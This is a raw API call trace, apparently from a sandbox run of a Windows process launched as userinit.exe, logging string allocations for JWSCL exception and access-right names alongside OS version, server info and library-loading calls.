[0100.274] SysReAllocStringLen (in: pbstr=0x2acf1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2acf1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2acf1e0*="EJwsclInvalidRevision") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2acf1c8*="EJwsclInvalidAceMismatch") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2acf1b0*="EJwsclRevisionMismatchException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2acf198*="EJwsclInvalidACEException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2acf180*="EJwsclReadOnlyPropertyException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2acf168*="EJwsclDuplicateListEntryException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2acf150*="EJwsclIndexOutOfBoundsException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2acf138*="EJwsclInvalidSidAuthorityValue") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2acf120*="EJwsclInvalidKnownSIDException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2acf108*="EJwsclInvalidComputer") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2acf0f0*="EJwsclInvalidGroupSIDException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2acf0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2acf0c0*="EJwsclInvalidSIDException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2acf0a8*="EJwsclInvalidSecurityListException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2acf090*="EJwsclInvalidMandatoryLevelException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2acf078*="EJwsclEmptyACLException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2acf060*="EJwsclNILParameterException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2acf048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2acf030*="EJwsclInvalidObjectArrayException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2acf018*="EJwsclProcessIdNotAvailable") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acf000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2acf000*="EJwsclWinCallFailedException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acefe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2acefe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acefd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2acefd0*="EJwsclNotImplementedException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acefb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2acefb8*="EJwsclAccessTypeException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acefa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2acefa0*="EJwsclAdjustPrivilegeException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2acef88*="EJwsclPrivilegeCheckException") returned 1
[0100.274] SysReAllocStringLen (in: pbstr=0x2acef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2acef70*="EJwsclPrivilegeNotFoundException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2acef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2acef40*="EJwsclPrivilegeException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2acef28*="EJwsclNotEnoughMemory") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2acef10*="EJwsclInvalidTokenHandle") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2aceef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2aceef8*="EJwsclNoThreadTokenAvailable") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2aceee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2aceee0*="EJwsclDuplicateTokenException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2aceec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2aceec8*="EJwsclInvalidOwnerException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2aceeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2aceeb0*="EJwsclInvalidPrimaryToken") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2acee98*="EJwsclTokenPrimaryException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2acee80*="EJwsclTokenImpersonationException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2acee68*="EJwsclTokenInformationException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2acee50*="EJwsclSharedTokenException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2acee38*="EJwsclOpenProcessTokenException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2acee20*="EJwsclOpenThreadTokenException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2acee08*="EJwsclSecurityException") returned 1
[0100.275] SysReAllocStringLen (in: pbstr=0x2acedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2acedf0*="Exception") returned 1
[0100.275] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.275] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0100.275] GetVersionExA (in: lpVersionInformation=0x22f534*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x5d0000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\\õ\"") | out: lpVersionInformation=0x22f534*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0100.275] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0100.275] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0100.281] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0100.281] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x22f5b8 | out: bufptr=0x22f5b8) returned 0x0
[0100.334] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0100.334] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0100.334] NetApiBufferFree (Buffer=0x5f1d00) returned 0x0
[0100.334] SetErrorMode (uMode=0x8000) returned 0x1
[0100.334] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0100.335] SetErrorMode (uMode=0x1) returned 0x8000
[0100.335] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.336] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.338] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.340] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0100.342] SysReAllocStringLen (in: pbstr=0x2acec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2acec40*="DELETE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2acec30*="READ_CONTROL") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2acec20*="WRITE_OWNER") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2acec10*="WRITE_DAC") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2acec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2acebf0*="FILE_READ_ATTRIBUTES") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2acebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2acebd0*="FILE_WRITE_DATA") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2acebc0*="FILE_READ_DATA") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2acebb0*="FILE_ALL_ACCESS") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2aceba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2aceb90*="STANDARD_RIGHTS_WRITE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2aceb80*="STANDARD_RIGHTS_READ") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2aceb70*="STANDARD_RIGHTS_ALL") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2aceb50*="DELETE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2aceb40*="READ_CONTROL") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2aceb30*="WRITE_OWNER") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2aceb20*="WRITE_DAC") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2aceb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2aceb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2aceaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2aceae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2acead0*="TOKEN_QUERY_SOURCE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2aceac0*="TOKEN_QUERY") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2aceab0*="TOKEN_IMPERSONATE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2aceaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2aceaa0*="TOKEN_DUPLICATE") returned 1
[0100.342] SysReAllocStringLen (in: pbstr=0x2acea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2acea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2acea80*="TOKEN_ALL_ACCESS") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2acea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2acea60*="STANDARD_RIGHTS_WRITE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2acea50*="STANDARD_RIGHTS_READ") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2acea40*="STANDARD_RIGHTS_ALL") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2acea30*="DELETE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2acea20*="READ_CONTROL") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2acea10*="WRITE_OWNER") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2acea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2acea00*="WRITE_DAC") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2ace9f0*="TIMER_MODIFY_STATE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2ace9e0*="TIMER_QUERY_STATE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2ace9d0*="TIMER_ALL_ACCESS") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace9a0*="STANDARD_RIGHTS_READ") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace990*="STANDARD_RIGHTS_ALL") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace980*="DELETE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace970*="READ_CONTROL") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace960*="WRITE_OWNER") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace950*="WRITE_DAC") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2ace940*="SECTION_EXTEND_SIZE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2ace930*="FILE_MAP_READ") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2ace920*="FILE_MAP_WRITE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2ace910*="FILE_MAP_COPY") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2ace900*="FILE_MAP_ALL_ACCESS") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.343] SysReAllocStringLen (in: pbstr=0x2ace8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace8d0*="STANDARD_RIGHTS_READ") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace8c0*="STANDARD_RIGHTS_ALL") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace8b0*="DELETE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace8a0*="READ_CONTROL") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace890*="WRITE_OWNER") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace880*="WRITE_DAC") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2ace870*="MUTEX_MODIFY_STATE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2ace860*="MUTEX_ALL_ACCESS") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace840*="STANDARD_RIGHTS_WRITE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace830*="STANDARD_RIGHTS_READ") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace820*="STANDARD_RIGHTS_ALL") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace810*="DELETE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace800*="READ_CONTROL") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace7f0*="WRITE_OWNER") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace7e0*="WRITE_DAC") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2ace7d0*="EVENT_MODIFY_STATE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2ace7c0*="EVENT_ALL_ACCESS") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace790*="STANDARD_RIGHTS_READ") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace780*="STANDARD_RIGHTS_ALL") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace770*="DELETE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace760*="READ_CONTROL") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace750*="WRITE_OWNER") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace740*="WRITE_DAC") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2ace730*="SEMAPHORE_MODIFY_STATE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2ace720*="SEMAPHORE_ALL_ACCESS") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.344] SysReAllocStringLen (in: pbstr=0x2ace700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace700*="STANDARD_RIGHTS_WRITE") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace6f0*="STANDARD_RIGHTS_READ") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace6e0*="STANDARD_RIGHTS_ALL") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace6d0*="DELETE") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ace6c0*="READ_CONTROL") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ace6b0*="WRITE_OWNER") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ace6a0*="WRITE_DAC") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2ace690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2ace680*="JOB_OBJECT_TERMINATE") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2ace670*="JOB_OBJECT_QUERY") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2ace660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2ace650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2ace640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ace630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ace620*="STANDARD_RIGHTS_WRITE") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ace610*="STANDARD_RIGHTS_READ") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ace600*="STANDARD_RIGHTS_ALL") returned 1
[0100.345] SysReAllocStringLen (in: pbstr=0x2ace5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ace5f0*="DELETE") returned 1
